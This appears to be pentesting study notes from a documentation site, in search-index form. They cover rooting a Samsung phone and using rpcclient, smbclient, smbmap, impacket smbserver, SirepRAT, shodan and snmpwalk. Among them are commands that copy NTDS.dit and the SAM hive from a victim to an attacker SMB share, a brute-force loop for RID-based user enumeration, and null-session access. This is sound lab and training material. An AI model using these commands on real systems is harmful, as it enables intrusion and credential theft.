Optionally, try to install Samsung DeX. I could not, but since the drivers were already installed, this step was optional.

                        "},{"location":"rooting-mobile/#backup-your-mobile","title":"Backup your mobile","text":"

Because we are going to perform a factory reset.

                        "},{"location":"rooting-mobile/#enable-developers-mode-in-your-device","title":"Enable developers mode in your device","text":"

Go to Settings > About phone > Software information > and tap repeatedly on \"Build number\" (typically seven times). Eventually you will see a countdown message, after which \"Developer mode\" is enabled.

                        "},{"location":"rooting-mobile/#enable-debug-mode","title":"Enable Debug mode","text":"

Go to Settings > Developer options (now enabled) > Debug mode, and set it to ON.

                        "},{"location":"rooting-mobile/#set-oem-unlocking-to-on","title":"Set OEM unlocking to ON","text":"

Go to Settings > Developer options (now enabled) > OEM unlocking, and set it to ON.

                        "},{"location":"rooting-mobile/#get-into-download-mode-and-unblock-the-bootloader","title":"Get into Download mode and unblock the Bootloader","text":"

Turn off your Android phone completely. But completely.

Press and hold Volume Up and Volume Down at the same time. While holding them, connect the USB-C cable to your device (and to your computer) and you will see a warning screen. Once you see it, you can release the volume buttons.

Now, long-press the Volume Up button and you will see this message (release when you see it):

                        The following two steps are:

Press Volume Up once and you will see a black screen. As soon as the screen turns black, quickly press Volume Up and Volume Down at the same time, once. With that, the bootloader will be unlocked.

Now we will enter Download mode by pressing the Volume Up button once.

Leave the device as it is and switch to your Windows VM.

                        "},{"location":"rooting-mobile/#flash-the-device-from-the-windows-vm","title":"Flash the device from the windows VM","text":"

First, you will need to make sure that you have the proper firmware file. To do that, open your device's properties and check the firmware version:

This, along with your phone model, will help you find the right firmware.

                        Download it to your windows VM and unzip it.

                        Open Odin.

                        Make sure the device appears.

Go to the Options tab and disable \"Auto Reboot\". In AP, select the firmware file; the process may take a while:

                        Click on Start and wait until you see the PASS message:

                        Be careful not to disconnect the USB-C cable.

                        "},{"location":"rooting-mobile/#enter-in-recovery-mode","title":"Enter in Recovery mode","text":"

Go back to your Android device and long-press the three buttons (Volume Up, Volume Down, and Power) at the same time.

When the screen turns black, release only Volume Down and keep holding the rest until the Samsung logo appears. From that point, count to three, then release only the Power button while keeping Volume Up pressed.

                        ...

Troubleshooting: Apparently, I did not do this correctly and got stuck in a situation where my phone was in Download mode displaying RMM/KG State: Prenormal. As a result, the OEM unlocking option was not available and the phone could not be rooted. The solution: https://www.youtube.com/watch?v=TBUY05mnCP8

After that, I did not know whether I had to go back to the flashing step or try to reach Download mode and then Recovery mode. I went through a loop of turning the phone on and off, with several reinstallations and frozen screens showing the Samsung logo. I saw the \"erasing\" message several times and...

Odin3 v3.14.4: https://dl2018.sammobile.com/Odin.zip

Samsung driver: https://developer.samsung.com/android-usb-driver

TWRP: https://forum.xda-developers.com/t/recovery-unofficial-teamwin-recovery-project-v3-6-2-android-11-12.4400869/

Magisk: https://github.com/topjohnwu/Magisk

                        MultiDisabler : https://forum.xda-developers.com/t/pie-10-11-system-as-root-multidisabler-disables-encryption-vaultkeeper-auto-flash-of-stock-recovery-proca-wsm-cass-etc.3919714/


                        Rooting a device will allow us to:

• install custom ROMs based on One UI, pure Android, or GSI (generic system image) builds
• modify on-device apps that require root access

We will also lose some Samsung features: Samsung Health, Samsung Gear, Samsung Safe folder, and the warranty.

But some of these features (Samsung Health, Samsung Gear, Samsung Safe folder) may be recovered with a custom ROM.

                        How to enable USB in virtualbox: https://www.techrepublic.com/article/how-to-enable-usb-in-virtualbox/

                        "},{"location":"rpcclient/","title":"rpcclient - A tool for interacting with smb shares","text":"

                        This is a tool to perform MS-RPC functions.

Remote Procedure Call (RPC) is a central mechanism for building distributed, work-sharing structures in networks and client-server architectures.

                        Remote Procedure Call (RPC) is a powerful technique for constructing distributed, client-server based applications. It is based on extending the conventional local procedure calling so that the called procedure need not exist in the same address space as the calling procedure. The two processes may be on the same system, or they may be on different systems with a network connecting them.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rpcclient/#basic-usage","title":"Basic usage","text":"
                        # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" 10.129.14.128\n\n# Server information\nsrvinfo\n\n# Enumerate all domains that are deployed in the network \nenumdomains\n\n# Provides domain, server, and user information of deployed domains.\nquerydominfo\n\n# Enumerates all available shares.\nnetshareenumall\n\n# Provides information about a specific share.\nnetsharegetinfo <share>\n\n# Enumerates all domain users.\nenumdomusers\n\n# Provides information about a specific user.\nqueryuser <RID>\n    # An example:\n    # rpcclient $> queryuser 0x3e8\n\n# Provides information about a specific group.\nquerygroup <ID>\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rpcclient/#brute-forcing-user-enumeration-with-rpcclient","title":"Brute forcing user enumeration with rpcclient","text":"
                        for i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rsat-remote-server-administration-tools/","title":"Remote Server Administration Tools (RSAT)","text":"

                        The Remote Server Administration Tools (RSAT) have been part of Windows since the days of Windows 2000. RSAT allows systems administrators to remotely manage Windows Server roles and features from a workstation running Windows 10, Windows 8.1, Windows 7, or Windows Vista. RSAT can only be installed on Professional or Enterprise editions of Windows.

                        • Script to install RSAT on Windows 10 1809, 1903, and 1909.
                        • Other versions of Windows and more documentation.
# Check if RSAT tools are installed\nGet-WindowsCapability -Name RSAT* -Online | Select-Object -Property Name, State\n\n# Install all RSAT tools\nGet-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online\n\n# Install a specific RSAT tool, for instance Rsat.ActiveDirectory.DS-LDS.Tools\nAdd-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online\n

Once installed, all of the tools will be available under: Control Panel > All Control Panel Items > Administrative Tools.

                        ","tags":["tools"]},{"location":"rules-of-engagement-checklist/","title":"Rules of Engagement - Checklist","text":"Checkpoint Contents \u2610 Introduction Description of this document. \u2610 Contractor Company name, contractor full name, job title. \u2610 Penetration Testers Company name, pentesters full name. \u2610 Contact Information Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. \u2610 Purpose Description of the purpose for the conducted penetration test. \u2610 Goals Description of the goals that should be achieved with the penetration test. \u2610 Scope All IPs, domain names, URLs, or CIDR ranges. \u2610 Lines of Communication Online conferences or phone calls or face-to-face meetings, or via e-mail. \u2610 Time Estimation Start and end dates. \u2610 Time of the Day to Test Times of the day to test. \u2610 Penetration Testing Type External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. \u2610 Penetration Testing Locations Description of how the connection to the client network is established. \u2610 Methodologies OSSTMM, PTES, OWASP, and others. \u2610 Objectives / Flags Users, specific files, specific information, and others. \u2610 Evidence Handling Encryption, secure protocols \u2610 System Backups Configuration files, databases, and others. \u2610 Information Handling Strong data encryption \u2610 Incident Handling and Reporting Cases for contact, pentest interruptions, type of reports \u2610 Status Meetings Frequency of meetings, dates, times, included parties \u2610 Reporting Type, target readers, focus \u2610 Retesting Start and end dates \u2610 Disclaimers and Limitation of Liability System damage, data loss \u2610 Permission to Test Signed contract, contractors agreement","tags":["information-gathering","rules of engagement","cpts"]},{"location":"samba-suite/","title":"Samba Suite","text":"

It is used to enumerate information from SMB services. It can be used in a null session attack.

                        ","tags":["pentesting"]},{"location":"samba-suite/#installation","title":"Installation","text":"

                        Download it from: https://www.samba.org/

                        ","tags":["pentesting"]},{"location":"samba-suite/#basic-commands","title":"Basic commands","text":"
                        1. Enumerate File Server services:
                        nmblookup -A $ip\n
2. We can also enumerate the shares provided by a host with smbclient:
smbclient -L //$ip -N\n\n# -L: look at what services are available on a target\n# //$ip: prepend the two slashes to the target IP\n# -N: force the tool not to ask for a password\n
3. Connect:
                        smbclient \\\\$ip\\sharedfolder -N\n

                        Be careful, sometimes the shell removes the slashes and you need to escape them.

4. Once connected, you can browse with the smb command line. To see the allowed commands, run: help
5. When you know the path of a file and want to retrieve it:
                          • from kali:
                            smbget smb://$ip/SharedFolder/flag_1.txt\n
                          • from smb command line:
                            get flag_1.txt\n
                        ","tags":["pentesting"]},{"location":"samrdump/","title":"SAMRDump","text":"

                        Impacket\u2019s samrdump.py communicates with the Security Account Manager Remote (SAMR) interface to list system user accounts, available resource shares, and other sensitive information.

                        ","tags":["pentesting windows"]},{"location":"samrdump/#basic-commands","title":"Basic commands","text":"
                        # path: /usr/share/doc/python3-impacket/examples/samrdump.py\npython3 samrdump.py $ip\n
                        ","tags":["pentesting windows"]},{"location":"scrcpy/","title":"scrcpy","text":"","tags":["mobile pentesting","android"]},{"location":"scrcpy/#installation","title":"Installation","text":"

                        Download from: https://github.com/Genymobile/scrcpy.

                        ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#on-linux","title":"On Linux","text":"

                        Source: https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md

                        First, you need to install the required packages:

                        # for Debian/Ubuntu\nsudo apt install ffmpeg libsdl2-2.0-0 adb wget \\\n                 gcc git pkg-config meson ninja-build libsdl2-dev \\\n                 libavcodec-dev libavdevice-dev libavformat-dev libavutil-dev \\\n                 libswresample-dev libusb-1.0-0 libusb-1.0-0-dev\n

                        Then clone the repo and execute the installation script (source):

                        git clone https://github.com/Genymobile/scrcpy\ncd scrcpy\n./install_release.sh\n

                        When a new release is out, update the repo and reinstall:

                        git pull\n./install_release.sh\n

                        To uninstall:

                        sudo ninja -Cbuild-auto uninstall\n

                        Note that this simplified process only works for released versions (it downloads a prebuilt server binary), so for example you can't use it for testing the development branch (dev).

                        ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#basic-usage","title":"Basic usage","text":"
                        scrcpy\n
                        ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#debugging","title":"Debugging","text":"

                        For scrcpy to work, there must be an adb connection, which requires:

                        • Having developer mode enabled.
                        • Having USB debug mode enabled.
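
As a sanity check (not scrcpy-specific), you can confirm the adb connection before launching it:

adb devices\n# the phone should be listed with state \"device\"; \"unauthorized\" means the USB debugging prompt was not accepted on the phone\n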

There is also an extra security restriction on Xiaomi MIUI devices, which blocks USB debugging from granting permissions and simulating input by default. Enable:

                        USB debugging (Security settings) Allow granting permissions and simulating input via USB debugging

This may require signing in to a Xiaomi account (or signing up if you don't have one).

Otherwise you will obtain error messages.

                        ","tags":["mobile pentesting","android"]},{"location":"searchsploit/","title":"searchsploit","text":"

                        The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers.

                        ","tags":["pentesting","web pentesting","exploitation"]},{"location":"searchsploit/#installation","title":"Installation","text":"

Pre-installed in Kali. Otherwise, download it from https://gitlab.com/exploit-database/exploitdb or install it with:

                        sudo apt install exploitdb -y\n
                        ","tags":["pentesting","web pentesting","exploitation"]},{"location":"searchsploit/#basic-usage","title":"Basic usage","text":"
                        searchsploit <WhatYouAreLookingFor>\n

                        Example:
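A hedged sketch (the search term and EDB-ID below are placeholders):

searchsploit apache 2.4\n# -m mirrors (copies) an exploit to the current directory by its EDB-ID\nsearchsploit -m 12345\n# -x examines an exploit without copying it\nsearchsploit -x 12345\n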

If you want to have a look at those PoCs, append the path provided to the root location of the searchsploit database (/usr/share/exploitdb/exploits).

                        ","tags":["pentesting","web pentesting","exploitation"]},{"location":"seatbelt/","title":"Seatbelt","text":"

                        Seatbelt is a C# project that performs a number of security oriented host-survey \"safety checks\" relevant from both offensive and defensive security perspectives.

                        ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"seatbelt/#installation","title":"Installation","text":"

                        Github repo: https://github.com/GhostPack/Seatbelt.
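Seatbelt ships as source and is typically compiled with Visual Studio. As a hedged usage sketch (check the repo README for the current command groups), a compiled binary is usually run as:

Seatbelt.exe -group=system\nSeatbelt.exe -group=all -full\n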

                        ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"servers/","title":"Setting up a server (in the attacking machine)","text":"Protocol / app smb server Apache server ngix symple python server php web server Ruby web server Burp Suite Collaborator Interactsh responder","tags":["servers","file transfer"]},{"location":"servers/#smb-server","title":"smb server","text":"

                        Launch smbserver in our attacker machine:

                        sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

Now, from PowerShell on the victim's Windows machine, we can move a file to the shared folder on the attacker machine just by running:

                        cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n
                        ","tags":["servers","file transfer"]},{"location":"servers/#apache-server","title":"Apache server","text":"

                        Once you have a folder structure such as \"/var/www/\" or \"/var/www/html\", and also an Apache server installed, you can serve all files from that path by initiating the service:

                        # Start Apache\nservice apache2 start\n\n# Stop Apache\nservice apache2 stop\n\n# Restart Apache\nservice apache2 restart\n\n# See status of Apache server\nservice apache2 status\n

                        In Apache, the PHP module loves to execute anything ending in PHP. Also, by default, with Apache, if we hit a directory without an index file (index.html), it will list all the files.

                        ","tags":["servers","file transfer"]},{"location":"servers/#nginx","title":"Nginx","text":"

In Apache, the PHP module loves to execute anything ending in PHP. This is not very safe when allowing HTTP uploads, as we want to prevent users from uploading web shells and executing them.

                        # Create a Directory to Handle Uploaded Files\nsudo mkdir -p /var/www/uploads/SecretUploadDirectory\n\n# Change the Owner to www-data\nsudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory\n\n# Create Nginx Configuration File by creating the file /etc/nginx/sites-available/upload.conf with the contents:\nserver {\n    listen 9001;\n\n    location /SecretUploadDirectory/ {\n        root    /var/www/uploads;\n        dav_methods PUT;\n    }\n}\n\n# Symlink our Site to the sites-enabled Directory\nsudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/\n\n# Start Nginx\nsudo systemctl restart nginx.service\n\n# If we get any error messages, check /var/log/nginx/error.log. we might see, for instance, port 80 is already in use.\n

Debugging Nginx:

First check: ensure directory listing is not enabled by navigating to http://localhost/SecretUploadDirectory.

Second check: is the Nginx default port already in use?

# Verifying errors\ntail -2 /var/log/nginx/error.log\n# we might see that port 80 could not be bound because it is already in use\n\n# See which service is using port 80\nss -lnpt | grep 80\n# we will obtain the service and also the PID, for instance 2811\n\n# Check the PID, for instance 2811, and see who is running it\nps -ef | grep 2811\n\n# To get around this, remove the default Nginx configuration, which binds port 80\nsudo rm /etc/nginx/sites-enabled/default\n

Finally, you can upload to your Nginx server any file you want to transfer with curl:

curl -T file.txt http://localhost:9001/SecretUploadDirectory/file.txt\n# -T, --upload-file <file>: transfers the specified local file to the remote URL using the PUT HTTP method (the URL matches the Nginx config above)\n
                        ","tags":["servers","file transfer"]},{"location":"servers/#simple-python-server","title":"Simple python server","text":"
                        # Creating a Web Server with Python3\ncd /tmp\npython3 -m http.server 8000\n\n# Creating a Web Server with Python2.7\npython2.7 -m SimpleHTTPServer\n
                        ","tags":["servers","file transfer"]},{"location":"servers/#php-web-server","title":"PHP web server","text":"
                        php -S 0.0.0.0:8000\n
                        ","tags":["servers","file transfer"]},{"location":"servers/#ruby-web-server","title":"Ruby Web Server","text":"
                        ruby -run -ehttpd . -p8000\n
                        ","tags":["servers","file transfer"]},{"location":"setting-up-mobile-penstesting/","title":"Setting up the mobile pentesting environment","text":"

                        Instructions

                        1. Start by installing drozer.
                        2. Install frida and, also, Burp certificate in frida.
                        3. Install apktool.
                        4. Install Objection.

                        Nice-to-have tools

                        1. Mobile Security Framework: MobSF.
                        2. mobsfscan.

                        ADB (Android Debug Bridge) cheat sheet.

                        ","tags":["mobile pentesting"]},{"location":"setting-up-mobile-penstesting/#resources","title":"Resources","text":"

                        https://medium.com/@lightbulbr/how-to-root-an-android-emulator-with-tiramisu-android-13-f070a756c499

                        Install Java JDK: https://wiki.centos.org/HowTos(2f)JavaDevelopmentKit.html

                        ","tags":["mobile pentesting"]},{"location":"sharpview/","title":"SharpView","text":"

SharpView is written in C# and does not support filtering using the pipeline.

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"sharpview/#installation","title":"Installation","text":"

.NET port of PowerView.

Download the GitHub repo from: https://github.com/tevora-threat/SharpView/.
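A hedged usage sketch: SharpView exposes PowerView's functions as command-line verbs (the identity values below are hypothetical):

SharpView.exe Get-DomainUser -Identity jane.doe\nSharpView.exe Get-DomainGroupMember -Identity \"Domain Admins\"\n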

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"shodan/","title":"shodan","text":"

                        Shodan can be used to find devices and systems permanently connected to the Internet like Internet of Things (IoT). It searches the Internet for open TCP/IP ports and filters the systems according to specific terms and criteria. For example, open HTTP or HTTPS ports and other server ports for FTP, SSH, SNMP, Telnet, RTSP, or SIP are searched. As a result, we can find devices and systems, such as surveillance cameras, servers, smart home systems, industrial controllers, traffic lights and traffic controllers, and various network components.

                        "},{"location":"shodan/#search-parameters","title":"Search parameters","text":"
                        country:\ncity:\ngeo:\nhostname:\nnet:\nos:\nport:\nbefore: / after:\n
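A minimal sketch combining these filters with the Shodan CLI (assumes the CLI is installed and initialized with an API key):

shodan init <API-KEY>\nshodan search \"port:443 country:DE\"\nshodan host 8.8.8.8\n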
                        "},{"location":"shodan/#example-shodan-for-enumeration","title":"Example: shodan for enumeration","text":"

                        Content from Pentesting notes:

                        crt.sh: it enables the verification of issued digital certificates for encrypted Internet connections. This is intended to enable the detection of false or maliciously issued certificates for a domain.

                        # Get all subdomais with that digital certificate\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq .\n\n# Filter all by unique subdomain\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq . | grep name | cut -d\":\" -f2 | grep -v \"CN=\" | cut -d'\"' -f2 | awk '{gsub(/\\\\n/,\"\\n\");}1;' | sort -u\n\n# With the list of unique subdomains, list all the Company hosted servers\nfor i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f4 >> ip-addresses.txt;done\n

                        Shodan: Once we see which hosts can be investigated further, we can generate a list of IP addresses with a minor adjustment to the cut command and run them through Shodan.

                        for i in $(cat ip-addresses.txt);do shodan host $i;done\n

                        Go to Pentesting notes to pursuit DNS enumeration.

                        "},{"location":"sireprat/","title":"SirepRAT - RCE as SYSTEM on Windows IoT Core","text":"

SirepRAT features full RAT capabilities without the need to write real RAT malware on the target.

https://github.com/SafeBreach-Labs/SirepRAT#context

                        ","tags":["windows","rce"]},{"location":"sireprat/#installation","title":"Installation","text":"
                        # Download the repository\ngit clone https://github.com/SafeBreach-Labs/SirepRAT.git\n\n# Run the installation\npip install -r requirements.txt\n
                        ","tags":["windows","rce"]},{"location":"sireprat/#basic-usage","title":"Basic usage","text":"","tags":["windows","rce"]},{"location":"sireprat/#usage","title":"Usage","text":"
                        # Download File bash\npython SirepRAT.py $ip GetFileFromDevice --remote_path \"C:\\Windows\\System32\\drivers\\etc\\hosts\" --v\n\n# Upload File\npython SirepRAT.py $ip PutFileOnDevice --remote_path \"C:\\Windows\\System32\\uploaded.txt\" --data \"Hello IoT world!\"\n\n# Run Arbitrary Program\npython SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\hostname.exe\"\n\n# With arguments, impersonated as the currently logged on user:\npython SirepRAT.py $ip LaunchCommandWithOutput --return_output --as_logged_on_user --cmd \"C:\\Windows\\System32\\cmd.exe\" --args \" /c echo {{userprofile}}\"\n\n# Try to run it without the\u00a0as_logged_on_user\u00a0flag to demonstrate the SYSTEM execution capability)\n# Get System Information\npython SirepRAT.py $ip GetSystemInformationFromDevice\n
                        ","tags":["windows","rce"]},{"location":"sireprat/#get-file-information","title":"Get File Information","text":"
                        python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path \"C:\\Windows\\System32\\ntoskrnl.exe\"\n
                        ","tags":["windows","rce"]},{"location":"sireprat/#see-help-for-full-details","title":"See help for full details:","text":"
                        python SirepRAT.py --help\n
                        ","tags":["windows","rce"]},{"location":"sireprat/#author","title":"Author","text":"","tags":["windows","rce"]},{"location":"sireprat/#related-labs","title":"Related Labs","text":"","tags":["windows","rce"]},{"location":"smbclient/","title":"smbclient - A tool for interacting with smb shares","text":"

                        See Quick Cheat sheet for smbclient.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-installation","title":"smbclient installation","text":"
                        sudo apt-get install smbclient\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-configuration","title":"smbclient configuration","text":"

                        Default settings are in /etc/samba/smb.conf.

                         cat /etc/samba/smb.conf | grep -v \"#\\|\\;\" \n
| Setting | Description |
| --- | --- |
| [sharename] | The name of the network share. |
| workgroup = WORKGROUP/DOMAIN | Workgroup that will appear when clients query. |
| path = /path/here/ | The directory to which the user is to be given access. |
| server string = STRING | The string that will show up when a connection is initiated. |
| unix password sync = yes | Synchronize the UNIX password with the SMB password? |
| usershare allow guests = yes | Allow non-authenticated users to access defined shares? |
| map to guest = bad user | What to do when a user login request doesn't match a valid UNIX user? |
| browseable = yes | Should this share be shown in the list of available shares? |
| guest ok = yes | Allow connecting to the service without using a password? |
| read only = yes | Allow users to read files only? |
| create mask = 0700 | What permissions need to be set for newly created files? |

                        For pentesting notes on ports 137, 138, 139 and 445 with a smb service, see 137-138-139-445-smb.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-connection","title":"smbclient connection","text":"


                        # [-L|--list=HOST] : Selecting the targeted host for the connection request.\nsmbclient -L -N //$ip\n# -N: Suppresses the password prompt.\n# -L: retrieve a list of available shares on the remote host\n

Smbclient will attempt to connect to the remote host and check if any authentication is required. If it is, it will ask for the password of your local username. If we do not specify a username when attempting to connect, smbclient will just use your local machine's username. If the target is vulnerable and we are performing a null session attack, we simply hit Enter when prompted for the password.

                        After authenticating, we may obtain access to some typical shared folders, such as:

                        ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.\n\nC$ - Administrative share for the C:\\ disk volume. This is where the operating system is hosted.\n\nIPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.\nWorkShares - Custom share. \n

We will try to connect to each of the shares except for IPC$, which is not valuable for us: it is not browsable like a regular directory and does not contain any files that we could use at this stage.

                        # the use of / and \\ might be different if you need to escape some characters\nsmbclient \\\\\\\\$ip\\\\ADMIN$\n

Important: sometimes some juggling with the slashes is needed:

                        smbclient -N -L \\\\$ip\nsmbclient -N -L \\\\\\\\$ip\nsmbclient -N -L /\\/\\$ip\n

                        If we have NT_STATUS_ACCESS_DENIED as output, we do not have the proper credentials to connect to this share.

Connect to a shared folder as Administrator:

                        smbclient -L 10.129.228.98 -U Administrator\n

We can also use the rpcclient tool to connect to the shared folders.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#basic-commands-in-smbclient","title":"Basic commands in SMBclient","text":"
                        # Show available commands\nhelp\n\n# Download a file\nget <file>\n\n# See status\nsmbstatus\n\n# Smbclient also allows us to execute local system commands using an exclamation mark at the beginning (`!<cmd>`) without interrupting the connection.\n!cmd\n\n!cat prep-prod.txt\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#quick-cheat-sheet","title":"Quick cheat sheet","text":"
                        # List shares on a machine using NULL Session\nsmbclient -L <target-IP>\n\n# List shares on a machine using a valid username + password\nsmbclient -L \\<target-IP\\> -U username%password\n\n# Connect to a valid share with username + password\nsmbclient //\\<target\\>/\\<share$\\> -U username%password\n\n# List files on a specific share\nsmbclient //\\<target\\>/\\<share$\\> -c 'ls' password -U username\n\n# List files on a specific share folder inside the share\nsmbclient //\\<target\\>/\\<share$\\> -c 'cd folder; ls' password -U username\n\n# Download a file from a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'cd folder;get desired_file_name' password -U username\n\n# Copy a file to a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'put /var/www/my_local_file.txt .\\target_folder\\target_file.txt' password -U username\n\n# Create a folder in a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'mkdir .\\target_folder\\new_folder' password -U username\n\n# Rename a file in a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'rename current_file.txt new_file.txt' password -U username\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbmap/","title":"SMBMap","text":"

SMBMap allows users to enumerate samba share drives across an entire domain. It can list share drives, drive permissions, and share contents, upload and download files, auto-download files whose names match a pattern, and even execute remote commands.

                        ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbmap/#installation","title":"Installation","text":"

                        Installation from https://github.com/ShawnDEvans/smbmap

                        sudo pip3 install smbmap\nsmbmap\n
                        ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbmap/#basic-usage","title":"Basic usage","text":"
                        # Enumerate network shares and access associated permissions.\nsmbmap -H $ip\n\n# # Enumerate network shares and access associated permissions with recursivity\nsmbmap -H $ip -r\n\n# Download a file from a specific share folder\nsmbmap -H $ip --download \"folder\\file.txt\"\n\n# Upload a file to a specific share folder\nsmbmap -H $ip --upload originfile.txt \"targetfolder\\file.txt\"\n
                        ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbserver/","title":"smbserver - from impacket","text":"

                        Simple SMB Server example. See impacket.

                        ","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#installation","title":"Installation","text":"

                        Download from: https://github.com/fortra/impacket/blob/master/examples/smbserver.py

                        ","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#basic-usage","title":"Basic usage","text":"","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#create-a-share-server-in-attacker-machine-and-connect-from-victims","title":"Create a share server in attacker machine and connect from victim's","text":"

                        Launch smbserver in our attacker machine:

                        sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

                        Also you can launch it with username and password:

                        sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/ -username \"username\" -password \"agreatpassword\"\n

                        Now, from PS in the victim's windows machine we could upload a folder to the shared folder in the attacker machine just by running:

                        cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n

                        Sidenote: see the HackTheBox machine Omni, which uses SirepRAT to upload files to the share. A taste of it:

# First create the share. After that, establish the connection:\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\Windows\System32\cmd.exe\" --args ' /c net use \\\\10.10.14.2\\CompData /u:username agreatpassword'\n\n# Now copy files to the share. In this case we are dumping hives\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\Windows\System32\cmd.exe\" --args ' /c reg save HKLM\sam \\\\10.10.14.2\\CompData\\sam'\n
                        ","tags":["pentesting windows","server","impacket"]},{"location":"snmpwalk/","title":"snmpwalk - SNMP scanner","text":"

                        See SNMP for details about the protocol.

Snmpwalk is used to query OIDs and their values. It retrieves a subtree of management values using SNMP GETNEXT requests.

                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"snmpwalk/#installation","title":"Installation","text":"
                        sudo apt-get install snmp\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"snmpwalk/#basic-usage","title":"Basic usage","text":"
# Walk the whole MIB tree using the default \"public\" community string\nsnmpwalk -v2c -c public $ip\n
# Query a single OID (1.3.6.1.2.1.1.5.0 is sysName)\nsnmpwalk -v 2c -c public $ip 1.3.6.1.2.1.1.5.0\n
# Try the \"private\" community string\nsnmpwalk -v 2c -c private $ip\n

If we do not know the community string, we can use onesixtyone with SecLists wordlists to brute-force it.
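
A sketch, assuming a Kali-style SecLists path (adjust the wordlist location to your system):

# Brute-force SNMP community strings from a wordlist\nonesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $ip\n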

                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"spawn-a-shell/","title":"Spawn a shell","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

A web shell is a script, written in a language that the server can execute. Web shells are not fully interactive.
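
As a minimal sketch of the concept (the cmd parameter name and shell.php path are arbitrary), a PHP web shell can be as small as:

<?php system($_GET['cmd']); ?>\n

Requesting http://target/shell.php?cmd=whoami would then run whoami on the server.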

                        Resources for upgrading simple shells
                        • https://sushant747.gitbooks.io/total-oscp-guide/content/spawning_shells.html.
                        • Cheat sheet.
                        • Shell creation.
                        • About webshells.

Sidenote: you can also generate a webshell by using msfvenom.

                        ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#clasification-of-shells","title":"Clasification of shells","text":"

                        On a Linux system, the shell is a program that takes input from the user via the keyboard and passes these commands to the operating system to perform a specific function.

                        There are three main types of shell connections:

                        Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shells \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shells Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command).","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#spawn-a-shell_1","title":"Spawn a shell","text":"","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#bash","title":"bash","text":"
# Upgrade the shell by running these commands in sequence:\n\nSHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n
